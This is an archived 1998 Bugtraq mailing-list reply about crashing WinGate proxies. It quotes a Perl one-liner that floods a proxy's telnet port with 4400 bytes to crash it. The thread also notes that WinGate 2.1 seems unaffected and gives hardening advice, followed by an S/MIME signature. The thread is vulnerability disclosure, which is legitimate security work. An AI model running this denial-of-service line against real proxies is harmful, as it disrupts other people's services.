[8570] in bugtraq
Re: crashing wingates
daemon@ATHENA.MIT.EDU (Noam Rathaus)
Mon Nov 16 13:40:11 1998
Date: Sun, 15 Nov 1998 19:58:42 +0200
Reply-To: dolittle@israelmail.com
From: Noam Rathaus <dolittle@ISRAELMAIL.COM>
X-To: G23 <g23@USA.NET>
To: BUGTRAQ@NETSPACE.ORG
This is a cryptographically signed message in MIME format.
--------------ms4A2A56A1B3180D3DD8A02218
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi,
I have to report that WinGate 2.1 seems to be unaffected.
G23 wrote:
>
> Hello,
>
> The following one-liner will crash an open Wingate.
>
> perl -MIO::Socket -e \
> 'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\
> ->send("X" x 4400 . "\n",0)'
>
> Unfortunately I don't have access to one that I can test,
> so I am unable to verify what versions are vulnerable.
> The above is my rendition of a 44 line sh script written
> by "rEWTED" (kefka@infected.org).
>
> Anyone configuring a proxy for LAN use should only bind to an internal
> interface anyway. (IE, kidz shouldn't even see your proxy)
> http://wingate.net/helppages/wingate2Securing_your_network.html
>
> If you do provide telnet proxy for the world, then at least log.
> http://wingate.net/helppages/wingate2Auditing_and_Logging.html
>
> ghost23
>
> ____________________________________________________________________
> Get free e-mail and a permanent address at http://www.netaddress.com/?N=1
--
Thanks
Noam Rathaus
http://members.xoom.com/dolittle
for Exchange Server Q&A : http://members.xoom.com/dolittle
PGP Key Fingerprint: 8AC7 62AD 860A 4327 3122 544F 34B6 F3A8 2515 7D02
"and - Change your quote already!" - Al Avi
--------------ms4A2A56A1B3180D3DD8A02218
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
MIIIOQYJKoZIhvcNAQcCoIIIKjCCCCYCAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC
BqcwggQiMIIDi6ADAgECAhBwjV0TvKpW56tEH6tMG+F6MA0GCSqGSIb3DQEBBAUAMGIxETAP
BgNVBAcTCEludGVybmV0MRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjE0MDIGA1UECxMrVmVy
aVNpZ24gQ2xhc3MgMSBDQSAtIEluZGl2aWR1YWwgU3Vic2NyaWJlcjAeFw05ODA1MDYwMDAw
MDBaFw05OTA1MDYyMzU5NTlaMIIBHjERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZl
cmlTaWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0gSW5kaXZpZHVh
bCBTdWJzY3JpYmVyMUYwRAYDVQQLEz13d3cudmVyaXNpZ24uY29tL3JlcG9zaXRvcnkvQ1BT
IEluY29ycC4gYnkgUmVmLixMSUFCLkxURChjKTk2MTMwMQYDVQQLEypEaWdpdGFsIElEIENs
YXNzIDEgLSBOZXRzY2FwZSBGdWxsIFNlcnZpY2UxFTATBgNVBAMTDE5vYW0gUmF0aGF1czEm
MCQGCSqGSIb3DQEJARYXZG9saXR0bGVAaXNyYWVsbWFpbC5jb20wXDANBgkqhkiG9w0BAQEF
AANLADBIAkEAxVe7ScoMm3tcGnWN7gqTrkeVw0hPt+R0zTfCN2Hy6iwXFgcSopzHwQ2XZVAk
Ifl7Ft3y8ZOyhRveHlz+uJ0xjwIDAQABo4IBXTCCAVkwCQYDVR0TBAIwADCBrwYDVR0gBIGn
MIAwgAYLYIZIAYb4RQEHAQEwgDAoBggrBgEFBQcCARYcaHR0cHM6Ly93d3cudmVyaXNpZ24u
Y29tL0NQUzBiBggrBgEFBQcCAjBWMBUWDlZlcmlTaWduLCBJbmMuMAMCAQEaPVZlcmlTaWdu
J3MgQ1BTIGluY29ycC4gYnkgcmVmZXJlbmNlIGxpYWIuIGx0ZC4gKGMpOTcgVmVyaVNpZ24A
AAAAAAAwEQYJYIZIAYb4QgEBBAQDAgeAMIGGBgpghkgBhvhFAQYDBHgWdmQ0NjUyYmQ2M2Yy
MDQ3MDI5Mjk4NzYzYzlkMmYyNzUwNjljNzM1OWJlZDFiMDU5ZGE3NWJjNGJjOTcwMTc0N2Rh
NWNmZWQxNDFiZWFkYjJiZDJlODkyMTJhOTY4ZjRkMTExNDg5ZmExYjI0M2Y0ZTQ5MDY1NDEw
DQYJKoZIhvcNAQEEBQADgYEAkKrsvDPLoIlu3uPUUHFaeQgg65ZTd+9VcNqzAyfHG8uNhOC/
wyEUYffENPhzpQnPoj2x0X6FXlWUKlywFuqv6hrHo6KXo7YdAWrkFNFA78kd4MIDrjGUKSG0
o9R5CHFMMkGuGIzEU2di+y3uDyzCLoyny78tkVICZlgJxfZIZfYwggJ9MIIB5qADAgECAhR1
E2tY84BpV3Wmok1ZEE2c6nZK8TANBgkqhkiG9w0BAQIFADBfMQswCQYDVQQGEwJVUzEXMBUG
A1UEChMOVmVyaVNpZ24sIEluYy4xNzA1BgNVBAsTLkNsYXNzIDEgUHVibGljIFByaW1hcnkg
Q2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNOTcwNjI0MDcwMDAwWhcNOTkwNjI0MDcwMDAw
WjBiMREwDwYDVQQHEwhJbnRlcm5ldDEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xNDAyBgNV
BAsTK1ZlcmlTaWduIENsYXNzIDEgQ0EgLSBJbmRpdmlkdWFsIFN1YnNjcmliZXIwgZ8wDQYJ
KoZIhvcNAQEBBQADgY0AMIGJAoGBALYUps9N0AUN2Moj0G+qtCmSY44s+G+W1y6ddksRsTaN
V8nD/RzGuv4eCLozypXqvuNbzQaot3kdRCrtc/KxUoNoEHBkkdc+a/n3XZ0UQ5tul0WYgUfR
Lcvdu3LXTD9xquJA8lQ5vBbuz3zsuts/bCqzFrGGEp2ukzTVuNXQ9z6pAgMBAAGjMzAxMBEG
CWCGSAGG+EIBAQQEAwIBBjAPBgNVHRMECDAGAQH/AgEBMAsGA1UdDwQEAwIBBjANBgkqhkiG
9w0BAQIFAAOBgQCSDEvpupPN/9rmYP2eZANmFS9WPDhMaEpHxfOrjyXZZkNzQxVzRL4USIFa
dwzMeurZsbzyi/8Rsd8UUEjcZR0LifmhXkhSb+21a/S4CEw48LmJZykP4OA396br1PTVQqld
/b3nnnwb50+FLQShYC6FuOvi+u8UBSYVGFVvE6EdcTGCAVowggFWAgEBMHYwYjERMA8GA1UE
BxMISW50ZXJuZXQxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2ln
biBDbGFzcyAxIENBIC0gSW5kaXZpZHVhbCBTdWJzY3JpYmVyAhBwjV0TvKpW56tEH6tMG+F6
MAkGBSsOAwIaBQCgfTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEP
Fw05ODExMTUxNzU4NDNaMB4GCSqGSIb3DQEJDzERMA8wDQYIKoZIhvcNAwICASgwIwYJKoZI
hvcNAQkEMRYEFD07tlz1BUzSA5Q7KjK8Xoko0TCcMA0GCSqGSIb3DQEBAQUABEA0FMHMMZzf
pNGkMuxrtZupQn/S2V1HBI4taLMPAbBT3SU2NWwKbC3bqWBWerhTM0N9oNYW59HN/cnN+LZb
JiFK
--------------ms4A2A56A1B3180D3DD8A02218--
